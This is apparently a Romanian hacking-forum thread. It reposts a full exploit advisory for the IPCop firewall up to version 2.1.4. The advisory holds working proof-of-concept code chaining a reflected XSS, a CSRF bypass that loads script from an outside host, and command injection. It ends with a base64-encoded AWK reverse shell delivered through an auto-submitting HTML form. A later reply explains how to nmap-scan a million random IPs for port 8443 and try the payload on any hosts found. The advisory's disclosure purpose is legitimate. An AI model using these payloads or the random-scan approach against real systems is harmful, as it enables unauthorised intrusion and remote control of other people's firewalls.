Aerosol Posted December 24, 2014 Report Posted December 24, 2014 ####################################################################### Exploit Title: IPCop <= 2.1.4 XSS to CSRF to Remote Command Execution# Date: 21/12/2014# Author: Yann CAM @ Synetis - ASafety# Vendor or Software Link: www.ipcop.org - www.ipcop.org/download.php# Version: 2.1.4# Category: Remote Command Execution# Google dork:# Tested on: IPCop distribution######################################################################IPCop firewall/router distribution description :======================================================================IPCop is a Linux distribution which aims to provide a simple-to-manage firewall appliance based on PC hardware. IPCop is a stateful firewall built on the Linux netfilter framework.Originally a fork of the SmoothWall Linux firewall, the projects are developed independently, and have now diverged significantly.IPCop includes a simple, user managed update mechanism to install security updates when required.In version <= 2.1.4 of the distribution, different vulnerabilities can be used to gain a Remote Command Execution (reverse-shell).In version <= 2.1.2 of the distribution, a Reflected XSS is available. Through this RXSS, the full reverse-shell can be obtained with only one URL.Proof of Concept 1 :======================================================================A non-persistent XSS in GET param is available in the ipinfo.cgi. The injection can be URLencoded with certain browsers.This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade).File /home/httpd/cgi-bin/ipinfo.cgi line 82 : &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);PoC:https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_by_Yann_CAM')</script>Proof of Concept 2 :======================================================================CSRF exploit bypass from previous XSS.IPCop is protected against CSRF attack with a referer checking on all page.It's possible to bypass this protection with the previous XSS detailed.To do this, load a third party JS script with the XSS, and make Ajax request over IPCop context (so with the right referer).This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade).File /home/httpd/cgi-bin/ipinfo.cgi line 82 : &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);PoC :Host a third party JS script on a web server accessible from IPCop. In this JS script, load JQuery dynamically and perform any AJAX request to an IPCop targeted page.All AJAX request bypass the CSRF protection. * Third party JS script, host in http://<PENTESTER_WEBSITE>/x.js:var headx=document.getElementsByTagName('head')[0];var jq= document.createElement('script');jq.type= 'text/javascript';jq.src= 'http://code.jquery.com/jquery-latest.min.js';headx.appendChild(jq); // jquery dynamic loadingfunction loadX(){ $.ajax({ type: 'POST', url: "https://<IPCop_IP>:8443/cgi-bin/<TARGETED_PAGE>", contentType: 'application/x-www-form-urlencoded;charset=utf-8', dataType: 'text', data: '<YOUR_DATA>' }); // payload of your choice }setTimeout("loadX()",2000); * XSS to load dynamically this third party script :var head=document.getElementsByTagName('head')[0];var script= document.createElement('script');script.type= 'text/javascript';script.src= 'http://<PENTESTER_WEBSITE>/x.js';head.appendChild(script); * Escape this string with escape() Javascript method :%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09 * Make the final URL with XSS in GET param that load dynamically the third party script (IE) :https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09"))</script>Proof of Concept 3 :======================================================================Remote Command Execution in the iptablesgui.cgi file. This file is protected from CSRF execution.Affected version <= 2.1.4 (patched in 2.1.5 upgrade).File /home/httpd/cgi-bin/iptablesgui.cgi line 99 (and also 102) : $output = `/usr/local/bin/iptableswrapper $cgiparams{'TABLE'} 2>&1`; The $cgiparams{'TABLE'} isn't sanitized before execution in command line. It's possible to change the "TABLE" post data with arbitrary data.To chain commands in this instruction, only || are usable (not && nor . So the first part of the command needs to return a false status.It can be done with no additional param :/usr/local/bin/iptableswrapper <NOTHING HERE> || <my personnal command will be executed here>So the RCE can be exploited with this PoC (if the Referer is defined to IPCop URL) :<html> <body> <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'> <input type='hidden' name='TABLE' value='||touch /tmp/x;#' /> <input type='hidden' name='CHAIN' value='' /> <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' /> </form> <script>document.forms['x'].submit();</script> </body></html>Note that the ACTION POST param depend on the IPCop language defined.Proof of Concept 4 :======================================================================Finally, with these three previous PoC, it's possible to combine all the mechanisms to gain a full reverse-shell on IPCop.IPCop does not have netcat nor telnet, socat, python, ruby, php etc ...The only way to make a reverse-shell is to use Perl or AWK technics. In this PoC, it's the AWK technic that is used :(From ASafety Reverse-shell cheat-sheet : http://www.asafety.fr/vuln-exploit-poc/pentesting-etablir-un-reverse-shell-en-une-ligne/) * The reverse-shell one-line with AWK is :awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null * To bypass IPCop filter, you need to encode this command in base64 (after modify <IP> and <PORT>) :YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsgfX0nIC9kZXYvbnVsbA== * Place a \n at each bloc of 64 chars in the base64 version :YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA== * This payload can be echo'ed and decoded with openssl, on the fly, into IPCop :echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d * To execute this payload, add backticks and eval call :eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d` * Your payload is ready to be used into TABLE POST param in iptablesgui.cgi, like the previous PoC :||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;# * Full PoC (IPCop <= 2.1.2, RXSS patched in 2.1.3 upgrade but RCE available to 2.1.4, patched in 2.1.5 upgrade) (if the referer is defined to IPCop URL, and a netcat is listening # nc -l -vv -p 1337) :<html> <body> <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'> <input type='hidden' name='TABLE' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#' /> <input type='hidden' name='CHAIN' value='' /> <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' /> </form> <script>document.forms['x'].submit();</script> </body></html>Note that none <IP>/<Port> are defined in the previous payload, you need to reproduce these different steps. * With the XSS method to bypass CSRF Referer checking, the third party JS script can be :var headx=document.getElementsByTagName('head')[0];var jq= document.createElement('script');jq.type= 'text/javascript';jq.src= 'http://code.jquery.com/jquery-latest.min.js';headx.appendChild(jq);function loadX(){ $.ajax({ type: 'POST', url: "https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi", contentType: 'application/x-www-form-urlencoded;charset=utf-8', dataType: 'text', data: 'CHAIN=&ACTION=Rafra%C3%AEchir&TABLE=%7C%7Ceval+%60echo+-e+%22YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA%22%22+%7C+openssl+enc+-a+-d%60%3B%23' }); }setTimeout("loadX()",2000); * A demonstration video has been realised as PoC here (IPCop 2.0.6 but work on IPCop 2.1.2) : https://www.youtube.com/watch?v=ovhogZGHyMgSolution:======================================================================- To patch the RXSS, install IPCop >= 2.1.3 or upgrade to 2.1.3.- To patch the RCE, install IPCop >= 2.1.5 or upgrade to 2.1.5. Report timeline :======================================================================2013-03-31 : Team alerted with details, PoC and video (via Sourceforge)2013-04-09 : Second alert sent to the team (via Sourceforge)2013-04-25 : Third alert sent to the IPCop english support forum2013-04-25 : PoC added in private on the sourceforge bug tracker, no response2013-04-30 : Ticket priority change from 5 to 8, no response.2014-02-13 : IPCop 2.1.1 released, RXSS not fixed, RCE not fixed, no news on ticket.2014-03-03 : IPCop 2.1.2 released, RXSS not fixed, RCE not fixed, no news on ticket.2014-04-03 : IPCop 2.1.3 released, RXSS fixed, RCE not fixed, no news on ticket.2014-04-08 : IPCop 2.1.4 released, RXSS fixed, RCE not fixed, no news on ticket.2014-05-02 : IPCop 2.1.5 released, RXSS fixed, RCE fixed, no news on ticket.2014-12-21 : Public article on ASafety and public advisoryAdditional resources :======================================================================- www.ipcop.org- sourceforge.net/p/ipcop/bugs/807/- sourceforge.net/projects/ipcop/- www.synetis.com- www.asafety.fr- www.asafety.fr/vuln-exploit-poc/xss-rce-ipcop-2-1-4-remote-command-execution- www.youtube.com/watch?v=ovhogZGHyMgCredits :====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information securityYann CAM - Security Consultant @ Synetis | ASafety--SYNETIS | ASafetyCONTACT: www.synetis.com | www.asafety.frSource Quote
iam60 Posted December 24, 2014 Report Posted December 24, 2014 Salut , fiind un forum unde unii intra sa invete ceva , poti face si un tutorial unde explici cum functioneaza? E probat ? Daca da, pune imaginile sa poata invata si altii. 1 Quote
iam60 Posted December 24, 2014 Report Posted December 24, 2014 (edited) Ca sa vezi cat e de prost :low iq cum sa ceri coaie un tutorial pentru exploit-ul acel ) LOL Ba esti incredibil de prost ma jur! vulnerabilitatea aia e pentru un anumit gen de ROUTER nu toti avem.... Stupid fucking people... Ce e ala ma ? Un router ?Nici engleza nu stii macar sa citesti ce scrie acolo? Ca paralel oricum esti in domeniu , dar citeste ce scrie macar. Edited December 24, 2014 by iam60 Quote
Aerosol Posted December 24, 2014 Author Report Posted December 24, 2014 (edited) Ca sa vezi cat e de prost :Ce e ala ma ? Un router ?Nici engleza nu stii macar sa citesti ce scrie acolo? Ca paralel oricum esti in domeniu , dar citeste ce scrie macar.omule esti terminat e vorba de o versiune a pentru firewall si sa facut patch!nu mai comenta aiurea + ai facut dublu post sa baneze cineva acest copil!"router" unde e greseala ma copile?m-am exprimat eu gresit probabil dar daca nu esti capabil sa intelegi asta e partea a doua!e pentru o versiune de firewall specifica unui anumit gen de router. Edited December 24, 2014 by Aerosol Quote
Ganav Posted December 24, 2014 Report Posted December 24, 2014 Salut , fiind un forum unde unii intra sa invete ceva , poti face si un tutorial unde explici cum functioneaza? E probat ? Daca da, pune imaginile sa poata invata si altii.Post-ul initial(cel de pe packetstorm) ilustreaza un mod prin care se poate obtine acces la o statie ce ruleaza distributia LINUX IPcop(care indeplineste functionalitatea de firewall(poate bloca, filtra pachete in functie de preferintele utilizatorului)). Post-ul prezinta cateva concepte(mijloace sau vectori de atac). Unul dintre acestea este:Proof of Concept 1 :======================================================================A non-persistent XSS in GET param is available in the ipinfo.cgi. The injection can be URLencoded with certain browsers.This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade).File /home/httpd/cgi-bin/ipinfo.cgi line 82 : &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);PoC:https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_by_Yann_CAM')</script>Deci pentru a exploata vulnetabilitatea trebuie sa gasim o statie de lucru care ruleaza IPcop. Stim ca are portul 8443 deschis. Ne folosim acum de nmap pentru a gasi statii care au respectivul port deschis(nu este un port standard deci sansele ca acestea sa foloseasca distributia IPcop sunt relativ ridicate):nmap -iR 1000000 -oG nlog -A -p 8443 --open1000000 este numarul de statii scanate, -iR specificam selectarea adreselor IP ale statiilor in mod arbitrar, -oG salvam rezultatele in fisierul nlog in directorul curent, -A dorim sa aflam distributia sistemului de operare care ruleaza pe respectivele statii, numele acestora(prin apeluri catre nslookup); poate fi omis pentru imbunatatirea performantelor, -p 8443 verifica portul 8443(daca este deschis sau nu).O data ce scanarea este finalizata poti lua fiecare statie cu port-ul 8443 deschis si sa incerci sa accesezi interfata de administrare astfel:https://<IP_gasit>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_bla_bla')</script>Poti folosi rezultatele gasite pentru a testa si restul vulnerabilitatilor descrise in respectivul post. Quote